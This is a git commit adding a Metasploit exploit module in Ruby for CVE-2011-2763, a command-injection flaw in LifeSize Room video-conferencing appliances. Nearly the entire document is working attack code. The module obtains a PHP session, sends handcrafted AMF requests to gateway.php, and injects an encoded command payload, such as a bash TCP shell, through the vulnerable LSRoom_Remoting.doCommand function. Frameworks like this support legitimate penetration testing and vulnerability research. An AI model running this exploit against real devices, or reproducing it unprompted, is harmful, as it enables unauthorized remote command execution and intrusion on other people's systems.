Add LifeSize room command injection (feature #5333)

git-svn-id: file:///home/svn/framework3/trunk@14143 4d416f70-5f16-0410-b530-b9f4589650da
2011-11-02 19:40:05 +00:00 · 2011-11-02 19:40:05 +00:00 · 3722a5c3c1
parent 131ffe4ab2
commit 3722a5c3c1
1 changed files with 117 additions and 0 deletions
--- a/modules/exploits/unix/http/lifesize_room.rb
+++ b/modules/exploits/unix/http/lifesize_room.rb
@ -0,0 +1,117 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'LifeSize Room Command Injection',
+			'Description'    => %q{
+					This module exploits a vulnerable resource in LifeSize
+				Room  versions 3.5.3 and 4.7.18 to inject OS commmands.  LifeSize
+				Room is an appliance and thus the environment is limited
+				resulting in a small set of payload options.
+			},
+			'Author'	=> 
+				[
+					# SecureState R&D Team - Special Thanks To Chris Murrey
+					'Spencer McIntyre',
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2011-2763' ],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Space'       => 65535,	# limited by the two byte size in the AMF encoding
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd cmd_bash',
+							'RequiredCmd' => 'generic bash-tcp',
+						}
+				},
+			'Platform'       => [ 'unix' ],
+			'Arch'           => ARCH_CMD,
+			'Targets'        => [ [ 'Automatic', { } ] ],
+			'DisclosureDate' => 'Jul 13 2011',
+			'DefaultTarget'  => 0))
+	end
+
+	def exploit
+		print_status("Requesting PHP Session...")
+		res = send_request_cgi({
+			'encode'    => false,
+			'uri'       => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
+			'method'    => 'GET',
+		}, 10)
+
+		if not res.headers['set-cookie']
+			print_error('Could Not Obtain A Session ID')
+			return
+		end
+
+		sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0]
+
+		headers = {
+			'Cookie'        => sessionid,
+			'Content-Type'  => 'application/x-amf',
+		}
+
+		print_status("Validating PHP Session...")
+
+		data  = "\x00\x00\x00\x00\x00\x02\x00\x1b"
+		data << "LSRoom_Remoting.amfphpLogin"
+		data << "\x00\x02/1\x00\x00\x00"
+		data << "\x05\x0a\x00\x00\x00\x00\x00\x17"
+		data << "LSRoom_Remoting.getHost"
+		data << "\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00"
+
+		res = send_request_cgi({
+				'encode'    => false,
+				'uri'       => '/gateway.php',
+				'data'      => data,
+				'method'    => 'POST',
+				'headers'   => headers,
+		}, 10)
+
+		if not res
+			print_error('Could Not Validate The Session ID')
+			return
+		end
+
+		print_status("Sending Malicious POST Request...")
+
+		# This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
+		amf_data =  "\x00\x00\x00\x00\x00\x01\x00\x19"
+		amf_data << "LSRoom_Remoting.doCommand"
+		amf_data << "\x00\x02\x2f\x37\xff\xff\xff\xff"
+		amf_data << "\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
+		amf_data << "\x02\x00\x0dupgradeStatus"
+
+		res = send_request_cgi({
+				'encode'    => false,
+				'uri'       => '/gateway.php?' << sessionid,
+				'data'      => amf_data,
+				'method'    => 'POST',
+				'headers'   => headers
+		}, 10)
+	end
+
+end